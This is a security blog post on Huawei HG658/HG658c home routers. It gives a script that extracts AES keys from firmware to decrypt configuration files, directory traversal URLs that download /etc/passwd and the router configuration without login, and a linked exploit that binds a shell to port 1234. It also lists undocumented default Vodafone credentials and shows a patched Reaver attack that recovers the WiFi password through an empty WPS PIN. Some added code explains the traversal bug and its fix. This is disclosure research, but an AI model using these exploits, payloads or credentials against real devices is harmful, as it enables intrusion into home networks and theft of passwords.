Decrypting Configuration Files From Other Huawei Home Gateway Routers

I am writing this since there is a lot of interest from people in decrypting the configuration files of other routers. I will show how the keys for other routers can be found in the firmware and copied into the hg635_configtool.py python program that has already been published. The router here is a Huawei hg658v2; the firmware was posted in the comments section of another blog post. This is not the only method used in Huawei Home Gateway routers, but it is the most common.

I will assume that you have the firmware and have extracted the root filesystem.
You need these four files:-

  1. libxmlapi.so
  2. libhttpapi.so
  3. libcfmapi.so
  4. libmsgapi.so

Step One

Load libxmlapi.so into IDA and go to the ATP_GetInfo1 function.

[image: libxmlapi]

Step Two

Go to the memory address that the function references. In this case it’s 0000CD44.
Copy the bytes from the hex view into a text editor as a hex string and remove the whitespace.

[image: hexview]

Step Three

Once the string is tidied up, copy and paste it into decode_keystore.py


#! /usr/bin/env python
from binascii import unhexlify
from Crypto.Cipher import AES          # PyCrypto / PyCryptodome

# Hex strings taken from ATP_GetInfo1..4 (one per library, see Step Four).
# The keystore blob is split across the four libraries one byte at a time:
# byte i of GetInfo1 is blob byte 4i, byte i of GetInfo2 is blob byte 4i+1, and so on.
GetInfo1="B909AEE8246..."         # <-String goes here
GetInfo2="ECDB9B11526..."
GetInfo3="B5FCB140995..."
GetInfo4="B88D12774CF..."

def main():
    # Re-interleave the four hex strings two characters (one byte) at a time
    result=""
    for x in range(0, len(GetInfo1),2):
        result += (GetInfo1[x:x+2] + GetInfo2[x:x+2] + GetInfo3[x:x+2] + GetInfo4[x:x+2] )

    raw=unhexlify(result)

    # Blob layout: [ciphertext][32-byte AES-256 key][16-byte IV][16 bytes not used here]
    key=raw[-64:-32]
    iv=raw[-32:-16]
    data=raw[:-64]

    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted_data = cipher.decrypt(data)
    # Plaintext is NUL-padded key=value text
    decrypted_data = decrypted_data.decode().rstrip('\0')
    print(decrypted_data)

if __name__ == "__main__":
    main()

Step Four

Repeat step 1-3 for the three other files:-

ATP_GetInfo2 is in libhttpapi.so
ATP_GetInfo3 is in libcfmapi.so
ATP_GetInfo4 is in libmsgapi.so

Step Five

Run the program. If you did everything correctly, you should have output similar to the following…

1=30000
2=20001
4=20
8=1
8=
10040=BDE00F6EE8FC04C8B427B1B6CAF24DAAE9304E3FD24B247BE0
20040=4E14D5457EC485B25A32212398D88371F0CF516635D3543A9139
1=30001
2=20001
4=20
8=1
8=
10040=F4EFB33E928186F3445B5E964160378E5718FC943B3C05F903D4
20040=207C240301C48764738846BAD58074551B513C3F6A0D29143102
1=30002
2=20001
4=10
8=1
8=
10040=B3C353837F0A5B90EDD013087DA2B607
20040=3C46FCF50F4EC875DE0AD8DA9A6D02BF
1=30003
2=80000
4=80
8=1
8=
40010=EAB4FB648F8CB95E4A29EC4A8265EC
80010=010001
40020=EAB4FB648F8CB95E4A29EC4A8265EC57450836763D
80020=010001
100020=C07474EB69963FEDE42C6A3852A296E09C977669102975
200020=FF4D35B54EE70B03F1AFB56294D02AFD80F768D8AECDF7
400020=EB59597DF4619EF5D8EFF3C1EF85509EDFB1B283E034A1F
800020=1DE0F56630C3CD803AAAEBB98BDD090AFE2AF6745590F96
1000020=CE14E83B55C221BAAF62B634ECF2F4FC996E759DEAB6C
2000020=8FD16E722036236821346C7286E9BF386FE49BB581DD4
1=30004
2=20001
4=20
8=1
8=
10040=11BACD4463C8BBBE3DABE52D522E39EF8896C79E76A7BB4D
20040=D10CAD164B3BE61BB4AB0EDCD7E347AF466A7214B866CFC5
1=9F0002
2=C0000
4=20
8=1
8=
4000000=74BAA767607C35DD244AB289ADC88E4B66D929035D343C1A9C
1=1A0000
2=80000
4=80
8=2
40010=B70E12FE035BBB59AFE655BAFE8729562A56FA95DA4F3CF4FC2DB6EE0C1
80010=010001

Step Six

Replace the keys in hg635_configtool.py with these ones:-

Key to Replace        Keyset/Keytype   Value
RSA_D                 30003/100020     C07474…
RSA_N                 30003/40010      EAB4FB…
AES256CBC_KEY         30000/10040      BDE00F…
AES256CBC_IV          30000/20040      4E14D5…
Passwords AES Key     30002/10040      B3C353…
Passwords AES IV      30002/20040      3C46FC…
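The lookup in the table above can be done programmatically rather than by eye. The parser below is an added example, not part of the original post or of hg635_configtool.py: it reads the key=value dump printed in Step Five and picks out the six entries the table names. The record layout it assumes is inferred from the table (a record starts at a 1=<keyset> line; 2, 4 and 8 are per-record header fields; every other line is <keytype>=<hex>) and is not documented by Huawei. The sample input is the dump from Step Five, with the hex values truncated exactly as they are printed there, so the byte counts it reports are shorter than real keys. The names parse_keystore, select_configtool_keys and CONFIGTOOL_KEYS are mine.

```python
"""Parse the decrypted keystore dump into keysets and select the
entries that hg635_configtool.py needs (Step Six).

Added example, not the post's own tooling.  Assumed record layout,
inferred from the Keyset/Keytype table: a record starts at "1=<keyset>",
fields 2/4/8 are headers, anything else is "<keytype>=<hex>".
"""

# Excerpt of the Step Five dump.  The post truncates the hex values, so
# lengths here are shorter than the real keys.
SAMPLE_DUMP = """\
1=30000
2=20001
4=20
8=1
8=
10040=BDE00F6EE8FC04C8B427B1B6CAF24DAAE9304E3FD24B247BE0
20040=4E14D5457EC485B25A32212398D88371F0CF516635D3543A9139
1=30002
2=20001
4=10
8=1
8=
10040=B3C353837F0A5B90EDD013087DA2B607
20040=3C46FCF50F4EC875DE0AD8DA9A6D02BF
1=30003
2=80000
4=80
8=1
8=
40010=EAB4FB648F8CB95E4A29EC4A8265EC
80010=010001
40020=EAB4FB648F8CB95E4A29EC4A8265EC57450836763D
80020=010001
100020=C07474EB69963FEDE42C6A3852A296E09C977669102975
"""

HEADER_FIELDS = {"2", "4", "8"}   # assumption: per-record metadata, not key material
HEX_DIGITS = set("0123456789ABCDEFabcdef")

# Keyset/Keytype -> constant in hg635_configtool.py, straight from the Step Six table.
CONFIGTOOL_KEYS = {
    "RSA_D":             ("30003", "100020"),
    "RSA_N":             ("30003", "40010"),
    "AES256CBC_KEY":     ("30000", "10040"),
    "AES256CBC_IV":      ("30000", "20040"),
    "PASSWORDS_AES_KEY": ("30002", "10040"),
    "PASSWORDS_AES_IV":  ("30002", "20040"),
}


def parse_keystore(text):
    """Return {keyset: {"header": {field: value}, "keys": {keytype: hex}}}."""
    keysets = {}
    current = None
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        if "=" not in line:
            raise ValueError("line %d is not key=value: %r" % (lineno, line))
        field, _, value = line.partition("=")
        if field == "1":                       # new record
            current = {"header": {}, "keys": {}}
            keysets[value] = current
        elif current is None:
            raise ValueError("line %d precedes the first 1=<keyset> record" % lineno)
        elif field in HEADER_FIELDS:
            current["header"].setdefault(field, value)   # "8=1" then "8=": keep the first
        else:
            if value and (len(value) % 2 or any(c not in HEX_DIGITS for c in value)):
                raise ValueError("line %d: %r is not even-length hex" % (lineno, value))
            current["keys"][field] = value
    return keysets


def select_configtool_keys(keysets):
    """Apply the Step Six table to a parsed dump; absent entries map to None."""
    out = {}
    for name, (keyset, keytype) in CONFIGTOOL_KEYS.items():
        out[name] = keysets.get(keyset, {}).get("keys", {}).get(keytype)
    return out


if __name__ == "__main__":
    ks = parse_keystore(SAMPLE_DUMP)
    for name, value in select_configtool_keys(ks).items():
        nbytes = len(value) // 2 if value else 0
        print("%-18s %s  (%d bytes in this excerpt)" % (name, value, nbytes))
```

Run it against the full, untruncated dump from your own decode_keystore.py run and check the byte counts before pasting anything into the config tool: the AES-256 key must be 32 bytes and the IV 16, and the RSA modulus and private exponent must be the same length.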

Result

Here is the finished file. hg658v2_configtool.py


Directory Traversal Bug

Files in the “/images” web server directory can be downloaded without having to log in.
The web server also fails to properly sanitise the URL. Combining the two, arbitrary files can be downloaded from the
router, e.g.

http://192.168.1.1/images/.../...//.../...//etc/passwd
http://192.168.1.1/images/.../...//.../...//config/currentcfg

“/config/currentcfg” contains the current router configuration. Once decrypted, the password hashes in the file
can be used to login. Note, the configuration tool I posted will not decrypt this file as the file format is slightly
different.
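Why a “.../...//” sequence walks out of the web root is easy to see once you assume a particular broken sanitiser. The following is an added illustration, not the HG658c’s web server code (the post does not show how the router processes the path): it assumes, hypothetically, that the server strips “../” once and non-recursively before opening the file, and contrasts that with the correct order of operations, normalise first and then check that the result is still under the served directory. Only the two request paths are taken from the post; IMAGES_ROOT, naive_sanitise, served_path, escapes_root and safe_resolve are mine.

```python
"""Naive "../" stripping versus normalise-then-check for the /images directory.

Added example; the sanitiser below is hypothetical, not the router's code.
"""
import posixpath

IMAGES_ROOT = "/images"            # the unauthenticated directory named in the post

# Request paths from the post (host prefix removed).
PAYLOADS = [
    "/images/.../...//.../...//etc/passwd",
    "/images/.../...//.../...//config/currentcfg",
]


def naive_sanitise(path):
    """Hypothetical bug: one non-recursive pass that deletes "../".

    Each ".../...//" holds two "../" substrings.  Deleting both leaves the
    surrounding ".", "." and "/" behind, i.e. exactly one fresh "../", so
    "/images/.../...//.../...//etc/passwd" becomes "/images/../../etc/passwd".
    """
    return path.replace("../", "")


def served_path(path, sanitise=naive_sanitise):
    """What the hypothetical server ends up opening: sanitise, then resolve."""
    return posixpath.normpath(sanitise(path))


def escapes_root(fs_path, root=IMAGES_ROOT):
    """True when the resolved path is not root itself or something below it."""
    resolved = posixpath.normpath(fs_path)
    return not (resolved == root or resolved.startswith(root + "/"))


def safe_resolve(path, root=IMAGES_ROOT):
    """The fix: resolve first, then reject anything outside the root.

    Returns the path to open, or None if the request must be refused.  No
    substring stripping takes place, so "..." is just an ordinary (and here
    non-existent) directory name rather than something that gets rewritten.
    """
    resolved = posixpath.normpath(path)
    if escapes_root(resolved, root):
        return None
    return resolved


if __name__ == "__main__":
    for p in PAYLOADS:
        opened = served_path(p)
        print("request :", p)
        print("  naive :", opened, "<- outside %s" % IMAGES_ROOT if escapes_root(opened) else "")
        print("  fixed :", safe_resolve(p))
```

The same check belongs on any file-serving handler regardless of authentication: the “/images” directory being readable without a login is only dangerous because the path it is joined with is not confined to that directory.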

A not so interesting Bug

The “B14” firmware had a bug described here on boards.ie by “Dermot McDonnell”. This was fixed in the “B18” firmware by replacing an insecure system() call with a safer ATP_UTIL_ExecCmdNoHang() call. Strangely, the other insecure system() calls were not fixed at the same time. Here is an exploit using one of the other system() call bugs. The exploit binds a command shell to TCP port 1234 on the router.

Download link => http://pastebin.com/1h7pci64

Default Vodafone Ireland Passwords

Changing the default password on the router is pointless when:
1) There are undocumented accounts on the router.
2) You don’t have the password needed to log into the account to change the password!

Here is a table of the three usernames and passwords that allow logging into the web interface. The “vodafone” username is the basic account, “superuser” allows full access and “admin” is somewhere between the other two.

Username    Password
vodafone    vodafone
admin       admin1234
superuser   HG-658c_VF_ie*

Obtaining the WiFi password in a few seconds using WPS

[image: wifi_setup_screen]

The default setting for WPS on the HG658c is “PBC” or “Push Button Configuration”. In this mode, when you attempt to connect to the router’s wireless network, you are prompted to press a button on the router in order to connect. If the router were only in this mode, it would be reasonably secure.


root@kali:~/reaver/new/src# reaver -i mon0 -c 6 -b 68:A0:F6:01:02:03 -v

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Waiting for beacon from 68:A0:F6:01:02:03
[+] Associated with 68:A0:F6:01:02:03 (ESSID: vodafone-XXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Pin count advanced: 1. Max pin attempts: 11000
[+] Trying pin 00005678.
[+] Pin count advanced: 2. Max pin attempts: 11000
[+] Trying pin 01235678.
[+] Pin count advanced: 3. Max pin attempts: 11000
[+] Trying pin 11115670.
[+] Pin count advanced: 4. Max pin attempts: 11000
[+] Trying pin 22225672.
[+] Pin count advanced: 5. Max pin attempts: 11000
[+] Trying pin 33335674.
[+] Pin count advanced: 6. Max pin attempts: 11000
[+] 0.05% complete. Elapsed time: 0d0h0m16s.
[+] Trying pin 44445676.
[+] Pin count advanced: 7. Max pin attempts: 11000
[+] Trying pin 55555678.
[+] Pin count advanced: 8. Max pin attempts: 11000
[+] Trying pin 66665670.
[+] Pin count advanced: 9. Max pin attempts: 11000
[+] Trying pin 77775672.
[+] Pin count advanced: 10. Max pin attempts: 11000
[!] WARNING: Detected AP rate limiting, waiting 60 seconds before re-checking
^C
[+] Session saved.


Running a WPS cracking tool called Reaver against the WiFi network shows that PIN mode is also active. In this mode you must enter a numerical PIN before you can access the WiFi network. The router stops responding to Reaver after ten guesses of the PIN, because the HG658c enters a lockout state after ten failed guesses and stays locked out until it is restarted. The router also seems to be immune to attempts to force it to restart using Mdk3. This effectively prevents the PIN from being brute-forced.

Connected to 192.168.1.1.
Escape character is '^]'.
-------------------------------
-----Welcome to ATP Cli------
-------------------------------

Login: !!Huawei
Password: 
ATP>sh


BusyBox vv1.9.1 (2014-02-08 20:26:13 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# nvram show  | grep wps_device_pin  
size: 2659 bytes (30109 left)
wps_device_pin=
#

By logging in to the router, we see that WPS PIN is set to an empty string. This is interesting because Reaver only checks numerical strings. After a quick and dirty modification to the Reaver source code, it is possible to check an empty string PIN.  The patch can be found here. To activate the patch, use the “-B” switch with reaver.


root@kali:~/reaver# git clone https://github.com/t6x/reaver-wps-fork-t6x.git reaver
root@kali:~/reaver# cd reaver
root@kali:~/reaver/reaver# patch -p1 < ../emptystringpin.diff 
root@kali:~/reaver/reaver# cd src/
root@kali:~/reaver/reaver/src# ./configure ; make
root@kali:~/reaver/reaver/src# ./reaver -i mon0 -c 6 -b 68:A0:F6:01:02:03 -v -B


Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Waiting for beacon from 68:A0:F6:01:02:03
[+] Associated with 68:A0:F6:01:02:03 (ESSID: vodafone-XXXX)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] WPS PIN: '12345670'
[+] WPA PSK: 'SuperSecretWifiPassword'
[+] AP SSID: 'vodafone-XXXX'


Oh noes, there is my super secret password! The same bug probably affects other Broadcom chipset based routers as well. I have not tested any others. Obviously, I recommend that you disable WPS to avoid this bug 😉

Enabling Telnet

Telnet can be enabled quite easily by setting “TelnetEnable” to “1” in the
configuration file. This also sets up firewall rules to permit access
to port 23.

“!!Huawei” and “@HuaweiHgw” are the default username and password.

ATP>sh

BusyBox vv1.9.1 (2014-02-08 20:26:13 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

Here is the output from a few commands that I ran.


# cat /proc/cpuinfo
system type        : 63268hg622b
processor        : 0
cpu model        : Broadcom4350 V8.0
BogoMIPS        : 399.36
wait instruction    : yes
microsecond timers    : yes
tlb_entries        : 32
extra interrupt vector    : no
hardware watchpoint    : no
ASEs implemented    :
shadow register sets    : 1
core            : 0
VCED exceptions        : not available
VCEI exceptions        : not available

unaligned exceptions        : 280
processor        : 1
cpu model        : Broadcom4350 V8.0
BogoMIPS        : 402.43
wait instruction    : yes
microsecond timers    : yes
tlb_entries        : 32
extra interrupt vector    : no
hardware watchpoint    : no
ASEs implemented    :
shadow register sets    : 1
core            : 0
VCED exceptions        : not available
VCEI exceptions        : not available

unaligned exceptions        : 280

 

# cat /proc/meminfo 
MemTotal:         123196 kB
MemFree:           70120 kB
Buffers:               0 kB
Cached:            15128 kB
SwapCached:            0 kB
Active:             6756 kB
Inactive:          13012 kB
Active(anon):       4644 kB
Inactive(anon):        0 kB
Active(file):       2112 kB
Inactive(file):    13012 kB
SwapTotal:             0 kB
SwapFree:              0 kB
Dirty:                 0 kB
Writeback:             0 kB
AnonPages:          4672 kB
Mapped:             3516 kB
Slab:              24612 kB
SReclaimable:        492 kB
SUnreclaim:        24120 kB
PageTables:          384 kB
NFS_Unstable:          0 kB
Bounce:                0 kB
WritebackTmp:          0 kB
CommitLimit:       61596 kB
Committed_AS:       7892 kB
VmallocTotal:    1032148 kB
VmallocUsed:        7884 kB
VmallocChunk:    1005596 kB

Running processes…

# ps
  PID  Uid        VSZ Stat Command
    1 0           412 S   init       
    2 0               SW< [kthreadd]
    3 0               SW< [migration/0]
    4 0               SW  [sirq-high/0]
    5 0               SW  [sirq-timer/0]
    6 0               SW  [sirq-net-tx/0]
    7 0               SW  [sirq-net-rx/0]
    8 0               SW  [sirq-block/0]
    9 0               SW  [sirq-tasklet/0]
   10 0               SW  [sirq-sched/0]
   11 0               SW  [sirq-hrtimer/0]
   12 0               SW  [sirq-rcu/0]
   13 0               SW< [migration/1]
   14 0               SW  [sirq-high/1]
   15 0               SW  [sirq-timer/1]
   16 0               SW  [sirq-net-tx/1]
   17 0               SW  [sirq-net-rx/1]
   18 0               SW  [sirq-block/1]
   19 0               SW  [sirq-tasklet/1]
   20 0               SW  [sirq-sched/1]
   21 0               SW  [sirq-hrtimer/1]
   22 0               SW  [sirq-rcu/1]
   23 0               SW< [events/0]
   24 0               SW< [events/1]
   25 0               SW< [khelper]
   28 0               SW< [async/mgr]
   29 0               SW< [board]
   99 0               SW< [kblockd/0]
  100 0               SW< [kblockd/1]
  109 0               SW< [khubd]
  126 0               SW< [bpm]
  142 0               SW  [pdflush]
  143 0               SW  [pdflush]
  144 0               SWN [kswapd0]
  146 0               SW< [crypto/0]
  147 0               SW< [crypto/1]
  219 0               SW< [mtdblockd]
  255 0               SW  [dsl0]
  257 0               SW< [linkwatch]
  265 0           452 S   -/bin/sh
  375 0               SWN [jffs2_gcd_mtd2]
  403 0           408 S   atserver
  413 0               SW  [kpAliveWatchdog]
  432 0               SW  [bcmsw]
  433 0               SW  [bcmsw_timer]
  458 0           920 S   mic
  460 0           320 S   klog
  462 0           560 S   log
  464 0          1928 S   cms
  692 0           376 S   ipcheck
  694 0           680 S   dhcps
  979 0           340 S   /bin/lld2d br0
 1006 0           284 S   /bin/eapd
 1009 0           548 S   /bin/nas
 1013 0           332 S   /bin/acsd
 1024 0           776 S   /bin/wps_monitor
 1055 0           456 S   /bin/radvd -C /var/radvd/radvd.conf br0
 1082 0           312 S   ipp -f /etc/printers.ini
 1084 0           412 S   dns
 1102 0           520 S   pppc -I ppp258
 1527 0           396 S   sntp
 1532 0           328 S   usbmount
 1563 0          2796 S < voiper start
 1565 0          2796 S < voiper start
 1566 0          2796 S < voiper start
 1567 0          2796 S < voiper start
 1568 0          2796 S < voiper start
 1569 0          2796 S < voiper start
 1581 0          2796 S < voiper start
 1586 0          2796 S < voiper start
 1587 0          2796 S < voiper start
 1588 0          2796 S < voiper start
 1589 0          2796 S < voiper start
 1590 0          2796 S < voiper start
 1591 0          2796 S < voiper start
 1592 0          2796 S < voiper start
 1593 0          2796 S < voiper start
 1594 0          2796 S < voiper start
 1595 0          2796 S < voiper start
 1596 0          2796 S < voiper start
 1597 0          2796 S < voiper start
 1598 0          2796 S < voiper start
 1599 0          2796 S < voiper start
 1600 0          2796 S < voiper start
 1601 0          2796 S < voiper start
 1602 0          2796 S < voiper start
 1603 0          2796 S < voiper start
 1607 0          2796 S < voiper start
 1707 0           588 R   telnet_cli -l 1
 1838 0           464 R   sh -si
 1839 0           416 R   ps 
 

Lots of open ports…

# netstat -l
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:37443           0.0.0.0:*               LISTEN      
tcp        0      0 192.168.1.1:1990        0.0.0.0:*               LISTEN      
tcp        0      0 127.0.0.1:8011          0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:www             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:ftp             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:ssh             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:telnet          0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:631             0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:https           0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:5916            0.0.0.0:*               LISTEN      
tcp        0      0 0.0.0.0:37215           0.0.0.0:*               LISTEN      
tcp        0      0 :::www                  :::*                    LISTEN      
tcp        0      0 :::ftp                  :::*                    LISTEN      
tcp        0      0 :::631                  :::*                    LISTEN      
tcp        0      0 :::https                :::*                    LISTEN      
udp        0      0 0.0.0.0:syslog          0.0.0.0:*                           
udp        0      0 0.0.0.0:37000           0.0.0.0:*                           
udp        0      0 127.0.0.1:38032         0.0.0.0:*                           
udp        0      0 0.0.0.0:42000           0.0.0.0:*                           
udp        0      0 127.0.0.1:42032         0.0.0.0:*                           
udp        0      0 127.0.0.1:40500         0.0.0.0:*                           
udp        0      0 0.0.0.0:domain          0.0.0.0:*                           
udp        0      0 127.0.0.1:domain        0.0.0.0:*                           
udp        0      0 0.0.0.0:39995           0.0.0.0:*                           
udp        0      0 0.0.0.0:bootps          0.0.0.0:*                           
udp        0      0 127.0.0.1:37064         0.0.0.0:*                           
udp        0      0 0.0.0.0:50000           0.0.0.0:*                           
udp        0      0 0.0.0.0:1900            0.0.0.0:*                           
udp        0      0 0.0.0.0:1900            0.0.0.0:*                           
udp        0      0 0.0.0.0:38000           0.0.0.0:*                           
udp        0      0 :::domain               :::*                                
udp        0      0 ::1:domain              :::*                                
raw        0      0 :::58                   :::*                    7           
raw        0      0 :::58                   :::*                    7           
raw        0      0 :::58                   :::*                    7   

 

Huawei HG658C Firmware Configuration Decryption Tool

If you ever downloaded the configuration file from the hg658c router, you might have noticed that it is encrypted.  Wouldn’t it be great if you were able to decrypt the file, make some changes and then upload it back onto the router? Now you can!

To decrypt a configuration file:
python hg658c_configtool.py decrypt input_file output_file

To encrypt a configuration file:
python hg658c_configtool.py encrypt input_file output_file

Download link =>  http://pastebin.com/8DPdK3V6